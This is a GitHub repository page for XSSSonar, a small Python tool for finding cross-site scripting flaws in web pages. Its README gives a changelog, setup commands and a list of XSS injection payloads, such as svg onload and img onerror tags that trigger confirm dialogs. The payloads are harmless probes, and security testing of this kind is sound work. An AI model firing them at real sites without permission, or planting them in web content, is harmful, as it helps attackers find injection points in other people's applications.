Skip to content

luigigubello/XSSSonar

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
1 branch 0 tags
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
README.md
 
 
xsssonar.png
 
 
xsssonar.py
 
 
XSSSonar Info ChangeLog List of XSS Payloads To start

README.md

XSSSonar

Little tool to look for XSS vulnerabilities in a web page.

XSS Sonar Screenshot

Info

This code is just a draft. There are some errors still to be corrected, and sometimes false positives occur.
Test with Python 2.7.9 on Debian Jessie. I'll write it for Python 3.x maybe.

ChangeLog

0.1.6
[-] Fixed some bugs
[-] Added scan on list of POST parameters
[-] Added option to assign default value to a POST parameter
[-] Added help function

0.1.5a
[-] Fixed some bugs
[-] Less than 400 lines of code

0.1.5
[-] Added scan on POST parameters
[-] Changed name

0.1.4a
[-] Added stopwatch to know the time spent to check each URL
[-] Same features with 1500 lines of code missing

0.1.4
[-] Check a single URL or a list.txt of sites

List of XSS Payloads

'">"'><img src=x onerror=confirm`XSS`>
"> <script>alert`XSS`</script>
'">"'><svg onload=confirm`XSS`>
"',;</script><script>confirm`XSS`</script>
'><svg onload=confirm`XSS`>
"><svg/onload=confirm`XSS`//
"><details/open/ontoggle=confirm`XSS`>
" onfocus="confirm`XSS`" autofocus=""
" onclick="confirm`XSS`"
" onmouseover="confirm`XSS`"
\"-confirm`XSS`//
\'-confirm`XSS`//
"-confirm`XSS`-"'-confirm`XSS`-'

To start

pip install fake-useragent
python xsssonar.py

About

Little python tool to look for XSS vulnerabilities in a web page

Resources

Readme
Activity

Stars

4 stars

Watchers

0 watching

Forks

4 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages